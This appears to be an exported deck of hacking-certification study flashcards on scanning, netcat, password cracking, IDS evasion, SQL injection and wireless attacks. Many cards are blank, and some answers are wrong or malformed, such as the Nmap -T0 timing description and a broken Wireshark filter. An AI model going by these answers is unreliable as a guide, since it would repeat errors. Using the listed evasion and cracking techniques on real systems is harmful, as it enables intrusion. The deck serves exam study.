-
TCP 445
SMB (filesharing)
-
-
-
-
Discovered UDP 69 is open
Unauthorized uploads and downloads
-
Wireshark command to capture packets
tcp.dst==<port>
-
-
chntpw
(old) lets you boot machine from CD and set admin password
-
-
-
Metasploit Pass-the-hash
SMBPASS
-
Crypto time memory trade off
Rainbow Table
-
MS Management
compmgmt.msc
-
Dimitri
Used for EXIF data
-
Dumper
Used for USB attacks
-
Resolve IP from name
host -t a <domain>
-
-
nslookup parameter for server records
set type=ns
-
-
-
-
-
CVSS Vulnerability Specific
Base
-
CVSS Threat Specific
Temporal
-
Fuzzer
Sends random or sequential values to a webapp in hopes of crashing or compromising it
-
Linux tool used for analyzing/parsing text and directory listings with regex to look for important words
grep
-
Tools for ripping passwords
- Cain & Abel
- John the Ripper
-
-
Hybrid Password Attack
Using a list of words and appending/prepending various characters to them to test as passwords
-
Snow
Uses spaces/tabs/carriage returns to hide information
-
-
-
-
KerbCrack
Password cracking tool
-
display all running services on a Windows computer
sc query
-
Rootkit objectives
- Hide user/files/processes
- Replace legitimate programs/functions
-
Valid methods Linux uses to secure /etc/passwd file
-
Code inside of an application file
Cavity Virus
-
Can infect both boot sector and exe files
Multipartite
-
Determine current bandwidth being used on a network
Sniffer
-
Best defense against ransomware
Backups
-
Putting files in a staging area and executing in a VM before being forwarded
Heuristic Analysis
-
Making your illegitimate website look legit so people believe it
Watering Hole
-
Software suite that is used by cybercriminals to attack/exploit victims
Blackhole
-
Blackhole vs Metasploit
Similar, but blackhole is more crime-oriented
-
Cryptolocker
Commonly-used ransomware
-
Tool used to insert malware into good applications
Wrapper
-
nc - l - p <port>
- netcat commands
- listen on specified port
-
nc <ip> <port>
- netcat command
- forward packets to ip address on port specified
-
Requires an OS to replicate, but doesn't spread from machine-machine automatically
Virus
-
Means of access bypassing normal authorization
- Trapdoor
- (i.e. a backdoor for when admins lock themselves out)
-
Tool used to determine which applications are using what ports
nbtstat
-
netcat -u
use UDP (instead of TCP)
-
-
netcat -w <number>
wait x seconds
-
lsof command
- list open files
- used in UNIX systems
- shows processes and what opened them
-
Wireshark returns details in
Hex
-
Tools for intercepting transmissions and injecting data into them
- Man In the Middle
- (I.e. Ettercap)
-
TCPDump
- Protocol Sniffer
- (Doesn't interact; is passive)
-
Nmap
- Network Mapper
- Discovers hosts and services on a network
-
ARP
Sends a broadcast looking for a MAC address associated with an IP address
-
Tool that can combine/manipulate multiple packet capture files
tcptrace
-
Port Stealing
causes switch to redirect frames intended for a server (or host) to a 3rd party
-
What level does a sniffer operate on?
Level 2 (Data Link)
-
Tool for detecting wireless networks
- Kismet
- Operates on Layer 2
- Is a net detector/sniffer/IDS
-
Kismet vs NetStumbler
- NetStumbler = Windows
- Kismet = LINUX
-
How to defend against ARP spoofing
Port Security enabled on switch
-
Smurf Attack
- Forged packet sent to broadcast address and all hosts reply to one victim
- Also known as "reflected"
-
Fraggle Attack
Smurf attack over UDP
-
Radioactive tab
Cain & Abel
-
ARPWALL
identifies suspicious ARP entry changes
-
Removes use of OUR packets
Static ARP entries
-
SPAN port
Allows to monitor switch ports by copying their frames
-
-
-
tcp..ack==1 && tcp.len=0
ACK
-
Using a switch and performing sniffing is considered
- ACTIVE
- (according to EC-Council)
-
Wireshark command to display all data containing 'facebook'
tcp contains facebook
-
Used to extract portions of a trace captured with TCPdump
TCPsplice
-
This tool generates continuous streams of frames to flood a switch and cause it to broadcast traffic
Macof
-
PCAP is the packet capture engine used for
-
DNS poisoning object
divert traffic traveling through DNS
-
-
Wireshark
Sniffer & Protocol Analyzer
-
MITM attack tools
- Dsniff
- Ettercap
- Caine & Abel
-
Windows packet capture library
WinPCAP
-
Vishing
Phishing with VoIP or automated systems
-
E-mail based
not an official aspect of social engineering
-
SYN FLOOD is an example of
- TCP state echaustion
- (consumes all available TCP connections)
- (this can also be considered DoS)
-
Overlapping packets
Fragmentation Attack
-
Authentication method used by modems/frame relay/ISDN
RADIUS
-
Client-Side Session Attacks
-
CSRF
- Cross-Site Request Forgery
- Taking advantage of someone else's session
-
-
httponly
- Flag on cookie that blocks JS from accessing the cookie
- Prevents cookie-based session stealing
-
TCP "session" hijacking occurs at the
- Transport Layer
- (This is an EC-Council thing)
-
Access Cards
Extensible Authentication Protocol (EAP)
-
NMap parameter resulting in stealth
-sS
-
-sS
Nmap parameter that determines open/closed ports but does not complete handshake
-
Type of scan used to get through packet filters
IP Fragment
-
Nmap -Pn
- tells Nmap not to probe if a host is up; scan instead
- Useful for evading IPS
-
Nmap -A
Detect OS and services
-
Nmap -sV
Service detection
-
-
nmap -sT
TCP connect scan
-
-
Nmap -T0
- literally "time 0"
- high speed scanning; no stealth
-
Tools to validate an IDS alert prior to escalating
-
Cryptcat
- Encrypted Netcat
- Uses SSL
- Reads/Writes data across a network
-
Looks at packet headers only
Packet Filter
-
Circuit Level Gateway
Inspects layer 1-4 information
-
Inspects all layers
Application-Level Firewall
-
TCP-Over-DNS
Allows for an encrypted tunnel that looks like a DNS exchange
-
Dividing a payload into multiple packets and delivering over an extended period of time to bypass IDS
Session Splicing
-
Tripwire
- File Integrity Checker
- also a System Integrity Verifier
-
Methods of evading an IDS
- Fragmentation
- Source Routing
- Spoofed Source Address
-
snort --> <ip> <port>
refers to rules to destination ip and port
-
Motivation for sending a TCP ACK flag
Trick device into believing there is already an established handshake
-
How can an IDS examine SSL/TLS traffic?
Use an accelerator or proxy
-
Block These to stop NetBIOS traffic
-
IPTables
- Linux application that can restrict inbound/outbound packets
- Also performs stateful inspection
-
-
Good choices for tunneling
-
Bash Bug/Shellshock
Allows a remote attacker to see or change environment parameters & interact with file systems
-
Basic Authentication is cleared
when the browser is closed
-
Shellshock attacks the
- CGI
- NOT the command shell!
-
Nikto
- Comprehensive pentesting tool
- Checks security
- Sends obfuscated messages
- Tries to bypass access controls
-
%2e%2e
".." in unicode/hex
-
Nmap engine for interrogating a web server
script=http-enum
-
Vulnerability Assessment Tools
-
Metasploit is a ____ tool
- exploitation
- NOT vulnerability assessment
-
Tools for banner grabbing
-
Use metasploit as a pivot point
Meterpreter
-
Union-based SQL Injection
Special commands to overlay data on pages or to call up internal variables from the SQL server
-
Static Analysis
Reading source code and discerning vulnerabilities in it
-
Vulnerability Scanners that perform static analysis
-
xp_cmdshell
MS SQL Server option that allows users to shell into remote servers running webapps
-
'waitfor delay'
Blind SQL Injection
-
-
-
Steal 802.11 messages that are using WEP-PSK
Aircrack-ng
-
Unsolicited bluetooth messages
Bluejacking
-
2007 TJ Maxx intrusion due to vulnerability in
WEP
-
Blueprinting
NOT a real BT attack
-
Kismet
- Runs on Linux
- Operates at Layer 2
- Used to discover wireless networks
-
Intercept frames needed to crack wireless protocols using
Airpcap
-
WPA2 Encryption
AES-CCMP 128-bit
-
-
Pre-Shared Key
Think of Symmetric Key
-
Problems with WEP
- Small IV (24-bit)
- Key Management
- Design Flaws
-
WEP Encryption Algorithm
RC4
-
Connecting to an AP with SSID broadcast disabled
SSID is inside AP and endpoint packets
-
SSID also acts as kind of a
- password for the network
- (according to EC-Council)
-
Jailbreak after booting
Userland jailbreak
-
Not a risk typically associated with BYOD
CPU Overrun
-
Not a valid element of MDM
Providing secure device disposal
-
Tool used to attack blackberry phones
BBproxy
-
-
Blueborne attacks
- Exploit weakness in BT protocol
- Not specific to a particular OS or application
-
SCADA ports
- Are not agreed upon
- Scan them all
- Scan TCP & UDP
-
Rolling Code
Attack on a car
-
-
-
-
LANMAN characteristics
- Forces all lowercase to uppercase
- Only processes first 14 characters, truncates rest
-
PaaS
Provide a gen purpose OS, which is configured and managed
-
IaaS
Datacenter in the cloud
-
Hybrid Cloud
Combination of Public & Private Cloud
-
-
Factoring Large Prime Numbers
RSA
-
Famous attack on OpenSSL
Heartbleed
-
IPSec operates at the ___ layer
-
SHA-1 message digets
160 bits
-
SHA-2 message digest
224/256 bits
-
IPSec feature for confidentiality
ESP header
-
PGP, SSL, SSH all employ
Public Key
-
IPSec is a ___ protocol
VPN
-
Creating 2 different files that have the same hash
Collision
-
This component of IPSec negotiates keys and encryption
IKE
-
Attack for decrypting data between browser and server (side channel)
POODLE
-
Hashing algorithms that check integrity
-
Password-Cracking Tools
- John The Ripper
- KerbCrack
- Cain & Abel
-
Characteristics of PKI
- PKI facilitates distribution of known pub keys
- Public Key encryption is slowed
- Digital Signatures use PKI
-
When users enroll in PKI, ____ verifies identity of the individual
Registration Authority
-
Best for bulk encrypting data
AES
-
Developed primarily for e-mail to provide digital signatures using asymmetric encryption
PGP
-
Passive Tools used to reveal info about a network
-
You tried to ping a site you know is up, but got nothing back
- They have ACL
- They have filtering enabled
-
____ is NOT a method of dealing with risk
Defer
-
resolving IP addresses from names (dns)
host -t a cnn.com
-
resolving DNS server names (dns)
host -t ns cnn.com
-
Proxy capable of alerting messages, inspecting them, and recording the responses
(attacking web apps)
-
Defines who or what may be tested
Scope
-
Enumerating a Windows System
Hyena
-
Loading a script that spawns instances of itself
Application Layer Attack
-
Having two tabs open and one attacks info from the other
CSRF
-
-
SQL injection attack that overlays data on your page
Union-based
-
Not a real BYOD risk
CPU Overrun
-
ICMP Type 0 Message
Echo Reply
-
Hacking Cycle:
Executing Applications -> ___________
Hiding Files
-
Nmap/Ping Suite protocols
-
User data being passed an interpreter as code
Injection
-
Even that may result in harm or loss
Threat
-
Using Nmap: You scan and find little to no response. What now?
-sO
-
Objective of Cross Site Scripting
Take over user identity
|
|